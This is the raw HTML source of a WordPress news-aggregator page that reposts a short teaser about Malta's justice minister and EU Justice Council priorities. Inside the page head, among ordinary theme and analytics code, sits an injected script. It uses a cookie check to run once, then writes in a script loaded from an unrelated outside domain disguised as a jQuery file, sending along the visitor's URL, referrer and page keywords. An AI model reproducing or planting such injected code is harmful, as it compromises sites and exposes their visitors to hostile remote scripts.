<!DOCTYPE html>
<html lang="en-US"
	itemscope 
	itemtype="http://schema.org/WebSite" 
	prefix="og: http://ogp.me/ns#"  class="no-js">
<head>

	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="http://gmpg.org/xfn/11">
		
	<title>Money laundering and European prosecutor&#8217;s office among priorities of Justice Council presidency | | LIBYA TODAY</title>

<!-- All in One SEO Pack Pro 2.4.11 by Michael Torbert of Semper Fi Web Design[292,421] -->
<!-- Debug String: WLF2HYY6PYUSNSTRQD1IMMNKSC4 -->
<link rel="author" href="https://plus.google.com/+Libyatodaycom" />
<meta name="description"  content="Justice minister Owen Bonnici meets counterparts from Luxembourg and the Netherlands for informal talks ahead of presidency" />

<meta name="keywords"  content="libya" />

<link rel="canonical" href="http://www.libya-today.com/money-laundering-and-european-prosecutors-office-among-priorities-of-justice-council-presidency/" />
<meta property="og:title" content="Money laundering and European prosecutor&#8217;s office among priorities of Justice Council presidency | | LIBYA TODAY" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://www.libya-today.com/money-laundering-and-european-prosecutors-office-among-priorities-of-justice-council-presidency/" />
<meta property="og:image" content="http://www.libya-today.com/wp-content/plugins/all-in-one-seo-pack-pro/images/default-user-image.png" />
<meta property="og:site_name" content="LIBYA TODAY" />
<meta property="og:description" content="Justice minister Owen Bonnici meets counterparts from Luxembourg and the Netherlands for informal talks ahead of presidency Read more" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:title" content="Money laundering and European prosecutor&#8217;s office among priorities of Justice Council presidency | | LIBYA TODAY" />
<meta name="twitter:description" content="Justice minister Owen Bonnici meets counterparts from Luxembourg and the Netherlands for informal talks ahead of presidency Read more" />
<meta name="twitter:image" content="http://www.libya-today.com/wp-content/plugins/all-in-one-seo-pack-pro/images/default-user-image.png" />
<meta itemprop="image" content="http://www.libya-today.com/wp-content/plugins/all-in-one-seo-pack-pro/images/default-user-image.png" />
			<script>
			(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
			(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
			m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
			})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

			ga('create', 'UA-50078778-1', { 'cookieDomain': 'www.libya-today.com' } );
			
			ga('send', 'pageview');
			</script>
					<script type="text/javascript">
						function recordOutboundLink(link, category, action) {
														ga('send', 'event', category, action);
														if (link.target == '_blank') return true;
							setTimeout('document.location = "' + link.href + '"', 100);
							return false;
						}
						/* use regular Javascript for this */
						function getAttr(ele, attr) {
							var result = (ele.getAttribute && ele.getAttribute(attr)) || null;
							if (!result) {
								var attrs = ele.attributes;
								var length = attrs.length;
								for (var i = 0; i < length; i++)
									if (attr[i].nodeName === attr) result = attr[i].nodeValue;
							}
							return result;
						}

						function aiosp_addLoadEvent(func) {
							var oldonload = window.onload;
							if (typeof window.onload != 'function') {
								window.onload = func;
							} else {
								window.onload = function () {
									if (oldonload) {
										oldonload();
									}
									func();
								}
							}
						}

						function aiosp_addEvent(element, evnt, funct) {
							if (element.attachEvent)
								return element.attachEvent('on' + evnt, funct);
							else
								return element.addEventListener(evnt, funct, false);
						}

						aiosp_addLoadEvent(function () {
							var links = document.getElementsByTagName('a');
							for (var x = 0; x < links.length; x++) {
								if (typeof links[x] == 'undefined') continue;
								aiosp_addEvent(links[x], 'onclick', function () {
									var mydomain = new RegExp(document.domain, 'i');
									href = getAttr(this, 'href');
									if (href && href.toLowerCase().indexOf('http') === 0 && !mydomain.test(href)) {
										recordOutboundLink(this, 'Outbound Links', href);
									}
								});
							}
						});
					</script>
					<!-- /all in one seo pack pro -->
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="LIBYA TODAY &raquo; Feed" href="http://www.libya-today.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="LIBYA TODAY &raquo; Comments Feed" href="http://www.libya-today.com/comments/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.libya-today.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=d04b163d79166c5a0ad5d0eb21d15082"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='contact-form-7-css'  href='http://www.libya-today.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.6' type='text/css' media='all' />
<link rel='stylesheet' id='gabfire-widget-css-css'  href='http://www.libya-today.com/wp-content/plugins/gabfire-widget-pack/css/style.css?ver=d04b163d79166c5a0ad5d0eb21d15082' type='text/css' media='all' />
<link rel='stylesheet' id='gabfire-style-css'  href='http://www.libya-today.com/wp-content/themes/advanced-newspaper/style.css?ver=d04b163d79166c5a0ad5d0eb21d15082' type='text/css' media='all' />
<link rel='stylesheet' id='custom-style-css'  href='https://fonts.googleapis.com/css?family=Droid+Sans%3A700%7COpen+Sans%3A400%2C700%7CRoboto+Condensed%3A400%2C700&#038;subset=latin-ext&#038;ver=d04b163d79166c5a0ad5d0eb21d15082' type='text/css' media='all' />
<script type='text/javascript' src='http://www.libya-today.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.libya-today.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://www.libya-today.com/wp-content/themes/advanced-newspaper/inc/js/jquery.cycle2.min.js?ver=d04b163d79166c5a0ad5d0eb21d15082'></script>
<script type='text/javascript' src='http://www.libya-today.com/wp-content/themes/advanced-newspaper/inc/js/theia-sticky-sidebar.js?ver=d04b163d79166c5a0ad5d0eb21d15082'></script>
<script type='text/javascript' src='http://www.libya-today.com/wp-content/themes/advanced-newspaper/inc/js/owl.carousel.min.js?ver=d04b163d79166c5a0ad5d0eb21d15082'></script>
<script type='text/javascript' src='http://www.libya-today.com/wp-content/themes/advanced-newspaper/framework/bootstrap/js/bootstrap.min.js?ver=d04b163d79166c5a0ad5d0eb21d15082'></script>
<script type='text/javascript' src='http://www.libya-today.com/wp-content/themes/advanced-newspaper/inc/js/responsive-menu.js?ver=d04b163d79166c5a0ad5d0eb21d15082'></script>
<link rel='https://api.w.org/' href='http://www.libya-today.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.libya-today.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.libya-today.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Mario Balotelli attracting interest from Premier League clubs &#8211; Mino Raiola &#8211; ESPN.co.uk' href='http://www.libya-today.com/mario-balotelli-attracting-interest-from-premier-league-clubs-mino-raiola-espn-co-uk/' />
<link rel='next' title='Man who threatened Gozo tribunal official jailed' href='http://www.libya-today.com/man-who-threatened-gozo-tribunal-official-jailed/' />

<link rel='shortlink' href='http://www.libya-today.com/?p=132422' />
<link rel="alternate" type="application/json+oembed" href="http://www.libya-today.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.libya-today.com%2Fmoney-laundering-and-european-prosecutors-office-among-priorities-of-justice-council-presidency%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.libya-today.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.libya-today.com%2Fmoney-laundering-and-european-prosecutors-office-among-priorities-of-justice-council-presidency%2F&#038;format=xml" />
<script type="text/javascript">
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i < evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i < evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//www.libya-today.com/?wordfence_logHuman=1&hid=A2DF57572F30B18F660CD17F10B100C4');
</script><link rel="shortcut icon" href="http://www.libya-today.com/wp-content/themes/advanced-newspaper/framework/admin/images/favicon.ico" />			<script type='text/javascript'>
			(function($) {
				$(document).ready(function() { 
					$(".children").parent("li").addClass("has-child-menu");
					$(".sub-menu").parent("li").addClass("has-child-menu");
					$(".drop").parent("li").addClass("has-child-menu");
					
					$('.fadeimage').hover(
						function() {$(this).stop().animate({ opacity: 0.5 }, 800);},
						function() {$(this).stop().animate({ opacity: 1.0 }, 800);}
					);
					
					$('.mastheadnav li ul,.mainnav li ul,.subnav li ul,.mastheadnav li ul,.mainnav li ul').hide().removeClass('fallback');
					$('.mastheadnav > li,.mainnav > li,.subnav > li,.mainnav > li').hover(
						function () {
							$('ul', this).stop().slideDown(250);
						},
						function () {
							$('ul', this).stop().slideUp(250);
						}
					);

					$('[data-toggle="tooltip"]').tooltip({
						'placement': 'top'
					});	

					$('.sidebar-wrapper, .post-wrapper')
					.theiaStickySidebar({
						additionalMarginTop: 30,
						additionalMarginBottom: 30
					});
				
					/* InnerPage Slider */
					var innerslider = $(".carousel-gallery");
					innerslider.owlCarousel({
					  autoPlay: 999999,
					  pagination:true,
					  singleItem : true,
					  autoHeight : true,
					  mouseDrag: false,
					  touchDrag: false					  
					});	
					$(".carousel-gallery-next").click(function(){
						innerslider.trigger('owl.next');
					});
					$(".carousel-gallery-prev").click(function(){
						innerslider.trigger('owl.prev');
					});
					
					/* InnerPage Slider */
					var owl4 = $(".carousel-four");
					owl4.owlCarousel({
					  autoPlay: 999999,
					  pagination:true,
					  singleItem : true,
					  autoHeight : true,
					  mouseDrag: false,
					  touchDrag: false					  
					});	
					$(".carousel-four-next").click(function(){
						owl4.trigger('owl.next');
					});
					$(".carousel-four-prev").click(function(){
						owl4.trigger('owl.prev');
					});						
					
					// Responsive Menu (TinyNav)
					$(".responsive_menu").tinyNav({
						active: 'current_page_item', // Set the "active" class for default menu
						label: ''
					});
					$(".tinynav").selectbox();			
					
					$('a[href="#top"]').click(function(){
						$('html, body').animate({scrollTop:0}, 'slow');
						return false;
					});
					$('.modal').on('shown.bs.modal', function() {
					  $(this).find('[autofocus]').focus();
					});					
				});
			})(jQuery);
			</script>
		







<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://020202.it/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
</head>

<body class="post-template-default single single-post postid-132422 single-format-standard" itemscope="itemscope" itemtype="http://schema.org/WebPage">


<div class="container">

	<header itemscope="itemscope" itemtype="http://schema.org/WPHeader" role="banner">
		<div class="row"><!-- Site Masthead Row-->
			<nav class="col-md-12 masthead-navigation" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement" role="navigation">
				<ul class="mastheadnav">
					
					<li><span class="arrow-right"></span></li>
											<li class="masthead_date">
							<script type="text/javascript">
								<!--
								var mydate=new Date()
								var year=mydate.getYear()
								if (year < 1000)
								year+=1900
								var day=mydate.getDay()
								var month=mydate.getMonth()
								var daym=mydate.getDate()
								if (daym<10)
								daym="0"+daym
								var dayarray=new Array("Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday")
								var montharray=new Array("January","February","March","April","May","June","July","August","September","October","November","December")
								document.write(""+dayarray[day]+", "+montharray[month]+" "+daym+", "+year+"")
								// -->
							</script>
						</li>
						<li></li>
										 
											
					
					<li class="pull-right gab_headersearch"> <a data-toggle="modal" href="#searchModal"><i class="fa fa-search"></i> Search</a></li>
					<li class="pull-right"></li>
				</ul>
			</nav>

			<!-- Modal -->
<div class="modal fade" id="searchModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
	<div class="modal-dialog">
	  <div class="modal-content">
		<div class="modal-header">
		  <button type="button" class="close" data-dismiss="modal" aria-hidden="true">&times;</button>
		  <h4 class="modal-title">Search in Site</h4>
		</div>
		<div class="modal-body">
			<form action="http://www.libya-today.com/">
				<div class="input-prepend">
					<label>To search in site, type your keyword and hit enter</label>
					<input type="text" name="s" class="form-control" placeholder="Type keyword and hit enter" autofocus>
				</div>
			</form>	
		</div>
		<div class="modal-footer">
		  <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
		</div>
	  </div><!-- /.modal-content -->
	</div><!-- /.modal-dialog -->
</div><!-- /.modal -->		</div><!-- /.row Site Masthead Row -->
	
		<div class="row">
			<div class="col-lg-12">
				<div id="header">
										
						<div class="themequote quoteleft">
						
															<span class="quoteimg hidden-sm">
																			<img src="http://www.libya-today.com/wp-content/themes/advanced-newspaper/images/putin.gif" alt="" />
																	</span>
														
							<span class="quotetext">
							
								<span class="quotecaption">
									Vladimir Putin								</span>
								
								<span class="quote">
									We have one Fatherland, one people and a common future								</span>
								
							</span>
						</div><!-- themequote quoteleft -->
						
						<div class="logo quotelogo" style="padding:15px 0px 15px 0px;">	
															<h1>
									<a href="http://www.libya-today.com/" title="">
										<img src="http://www.libya-today.com/wp-content/uploads/2014/07/logo11.png" alt="LIBYA TODAY" title="LIBYA TODAY"/>
									</a>
								</h1>
													</div><!-- logo -->
						
						<div class="themequote quoteright">
							
															<span class="quoteimg hidden-sm">
																			<img src="http://www.libya-today.com/wp-content/themes/advanced-newspaper/images/obama.gif" alt="" />
																	</span>
														
							<span class="quotetext">
							
								<span class="quotecaption">
									Barack Obama								</span>
								<span class="quote">
									You know, my faith is one that admits some doubt								</span>
								
							</span>
							
						</div><!-- themequote quoteright -->
											

				</div><!-- /header -->	
			</div><!-- /col-lg-12 -->	
		</div><!-- /row -->	
		
		<div class="row site-nav">
			<div class="col-lg-12">
				
				<nav class="main-navigation" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement" role="navigation">
					<ul class="mainnav responsive_menu">
						<li><a href="http://www.libya-today.com/">HOME</a></li>
						<li id="menu-item-23483" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-23483"><a href="http://www.libya-today.com/category/libya/">LIBYA</a></li>
<li id="menu-item-23472" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-23472"><a href="http://www.libya-today.com/category/business/">BUSINESS</a></li>
<li id="menu-item-23501" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-23501"><a href="http://www.libya-today.com/category/world/">WORLD</a></li>
<li id="menu-item-23486" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-23486"><a href="http://www.libya-today.com/category/mena/">MIDDLE EAST</a></li>
<li id="menu-item-23495" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-23495"><a href="http://www.libya-today.com/category/sports/">SPORTS</a></li>
<li id="menu-item-23494" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-23494"><a href="http://www.libya-today.com/category/technology/">SCIENCE &#038; TECH</a></li>
<li id="menu-item-23481" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-23481"><a href="http://www.libya-today.com/category/health-fitness/">HEALTH &#038; FITNESS</a></li>
					</ul>
				</nav>
				
				<nav class="secondary-navigation" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement" role="navigation">
					<ul class="subnav responsive_menu">
						<li id="menu-item-96899" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-96899"><a href="http://www.libya-today.com/">Home</a></li>
<li id="menu-item-96900" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-96900"><a href="http://www.libya-today.com/about/">About</a></li>
<li id="menu-item-96901" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-96901"><a href="http://www.libya-today.com/submit-news/">Submit News</a></li>
<li id="menu-item-23525" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-23525"><a href="http://www.libya-today.com/category/opinion/">OPINION</a></li>
<li id="menu-item-60246" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-60246"><a href="http://www.libya-today.com/category/natural-features/">NATURAL FEATURES</a></li>
<li id="menu-item-90391" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-90391"><a href="http://www.libya-today.com/category/haj/">Haj</a></li>
	
					</ul>
				</nav>				
				
			</div>
		</div>	
	</header>
	
	<div class="row ">
	
				
		<main class="col-xs-12 col-md-8 col-sm-8 post-wrapper" role="main" itemprop="mainContentOfPage" itemscope="itemscope" itemtype="http://schema.org/Blog">

							<div class="row">
					<div class="col-lg-12 col-md-12">
						<div class="post-lead">
							<h1 class="entry-title single-post-title" itemprop="headline">
								Money laundering and European prosecutor&#8217;s office among priorities of Justice Council presidency							</h1>
							
							<p class="postmeta"><span class="gabfire_meta gabfiremeta_bydate">By <span class="author vcard" itemscope="itemscope" itemtype="http://schema.org/Person" itemprop="author"><a href="http://www.libya-today.com/author/admin-2/" rel="author" class="fn" itemprop="name">Editor-In-Chief</a></span> on <time class="published updated" itemprop="datePublished" datetime="December 22, 2016T13:43">December 22, 2016</time></span><span class="gabfire_meta gabfiremeta_comment"><span>Comments Off<span class="screen-reader-text"> on Money laundering and European prosecutor&#8217;s office among priorities of Justice Council presidency</span></span></span></p>						</div>		
					</div>
				</div>			
						
				
		<section class="article-wrapper">
		
						
				<article itemscope itemtype="http://schema.org/NewsArticle" class="entry post-132422 post type-post status-publish format-standard has-post-thumbnail hentry category-libya last_archivepost">
										
								
							<div class="social-sharethis-post">
										
				
					<a href="http://www.facebook.com/sharer.php?u=http://www.libya-today.com/money-laundering-and-european-prosecutors-office-among-priorities-of-justice-council-presidency/&t=Money laundering and European prosecutor&#8217;s office among priorities of Justice Council presidency" data-toggle="tooltip" title="Share on Facebook" rel="nofollow"><span>Share on Facebook</span>
						<i class="fa fa-facebook pull-left"></i>
					</a>

					<a href="http://twitter.com/home?status=Money laundering and European prosecutor&#8217;s office among priorities of Justice Council presidency => http://www.libya-today.com/money-laundering-and-european-prosecutors-office-among-priorities-of-justice-council-presidency/" data-toggle="tooltip" title="Share on Twitter" rel="nofollow"><span>Follow on Facebook</span>
						<i class="fa fa-twitter pull-left"></i>
					</a>

					<a href="https://plus.google.com/share?url=http://www.libya-today.com/money-laundering-and-european-prosecutors-office-among-priorities-of-justice-council-presidency/" data-toggle="tooltip" title="Share on Google+" rel="nofollow"><span>Add to Google+</span>
						<i class="fa fa-google-plus pull-left"></i>
					</a>

					<a href="http://www.linkedin.com/shareArticle?mini=true&url=http://www.libya-today.com/money-laundering-and-european-prosecutors-office-among-priorities-of-justice-council-presidency/&title=Money laundering and European prosecutor&#8217;s office among priorities of Justice Council presidency&summary=&source=LIBYA TODAY" data-toggle="tooltip" title="Share on LinkedIn" rel="nofollow"><span>Connect on Linked in</span>
						<i class="fa fa-linkedin pull-left"></i>
					</a>

					<a class="pull-right" href="mailto:?mailto:?subject=LIBYA%20TODAY%20%3A%20&amp;body=I%20recommend%20this%20page%3A%20.%0AYou%20can%20read%20it%20on%3A%20http%3A%2F%2Fwww.libya-today.com%2Fmoney-laundering-and-european-prosecutors-office-among-priorities-of-justice-council-presidency%2F" data-toggle="tooltip" title="Send by Email" rel="nofollow"><span>Subscribe by Email</span>
						<i class="fa fa-envelope-o pull-left"></i>
					</a>
					
					<a class="pull-right" href="javascript:window.print()" data-toggle="tooltip" title="Print This Post" rel="nofollow"><span>Print This Post</span>
						<i class="fa fa-print pull-left"></i>
					</a>
				</div>	
				<div class="clearfix"></div>
			<div class="entry-content" itemprop="text"><p>Justice minister Owen Bonnici meets counterparts from Luxembourg and the Netherlands for informal talks ahead of presidency </p>
<p><a href=http://www.maltatoday.com.mt/news/europe/72845/money_laundering_and_european_prosecutors_office_among_priorities_of_justice_council_presidency_>Read more</a></p>
<div class="single_postmeta">
<p><img alt='' src='http://0.gravatar.com/avatar/6da63a5b41fb07b3d27c3d85e3c6bb35?s=35&#038;d=mm&#038;r=g' srcset='http://0.gravatar.com/avatar/6da63a5b41fb07b3d27c3d85e3c6bb35?s=70&amp;d=mm&amp;r=g 2x' class='avatar avatar-35 photo' height='35' width='35' /></p>
<p><strong class="entry-title">Money laundering and European prosecutor&#8217;s office among priorities of Justice Council presidency</strong> added by <a href="http://www.libya-today.com/author/admin-2/" rel="author" class="author vcard"><span class="fn">Editor-In-Chief</span></a> on <time class="published updated" itemprop="datePublished" datetime="2016-12-22T13:43">December 22, 2016</time><br /><a class="block" href="http://www.libya-today.com/author/admin-2/">View all posts by Editor-In-Chief &rarr;</a></p>
</div>
</div>					<meta content="2016-12-22T13:43" itemprop="datePublished">
				</article>
				
			
							
		</section><!-- articles-wrapper -->			
		</main><!-- col-md-8 -->
		
		<div class="col-md-4 col-sm-4 col-xs-12 sidebar-wrapper">
	<div class="theiaStickySidebar">
		<div class="sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
					</div>
	</div>	
</div>	</div>	
	
	<footer role="contentinfo" itemscope="itemscope" itemtype="http://schema.org/WPFooter">

		<div class="row footercats">
			<div class="col-md-12">
				<ul itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement" role="navigation">
					<li id="menu-item-96488" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-96488"><a href="#">Disclaimer</a></li>
<li id="menu-item-96489" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-96489"><a href="#">Privacy</a></li>
<li id="menu-item-96490" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-96490"><a href="#">Advertisement</a></li>
<li id="menu-item-96491" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-96491"><a href="#">Contact Us</a></li>
	
				</ul>
			</div>
		</div>
			
		<div class="footer-firstrow row">
		
			<div class="col-md-4 col-lg-4 col-sm-3 col-xs-12 footer-firstrow-widget">
							</div>
			
			<div class="col-md-4 col-lg-4 col-sm-4 col-xs-12 footer-firstrow-widget footer-mid-column">
							</div>
			
			<div class="col-md-4 col-lg-4 col-sm-5 col-xs-12 footer-firstrow-widget">
							</div>
			
		</div>
	<div class="row footer-meta-wrapper">
		<div class="col-md-12">
			<div class="footer-meta">
			
				<div class="footer-metaleft pull-left">
					LIBYA TODAY				</div><!-- #site-info -->
							
				<div class="footer-metaleft pull-right">
					All Right Reserved. 					<a href="http://wordpress.org/" title="Semantic Personal Publishing Platform" rel="generator">Powered by WordPress</a> - 
					<a href="http://www.gabfirethemes.com/" title="WordPress Newspaper Themes">Gabfire Themes</a> 
					<script type='text/javascript' src='http://www.libya-today.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var _wpcf7 = {"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.libya-today.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.6'></script>
<script type='text/javascript' src='http://www.libya-today.com/wp-content/plugins/gabfire-widget-pack/js/jquery.tools.min.js?ver=d04b163d79166c5a0ad5d0eb21d15082'></script>
<script type='text/javascript' src='http://www.libya-today.com/wp-includes/js/wp-embed.min.js?ver=d04b163d79166c5a0ad5d0eb21d15082'></script>
				</div> <!-- #footer-right-side -->
			</div>
		</div>
	</div>
		
	</footer><!-- /footer -->
	
</div><!-- /container -->

</body>
</html>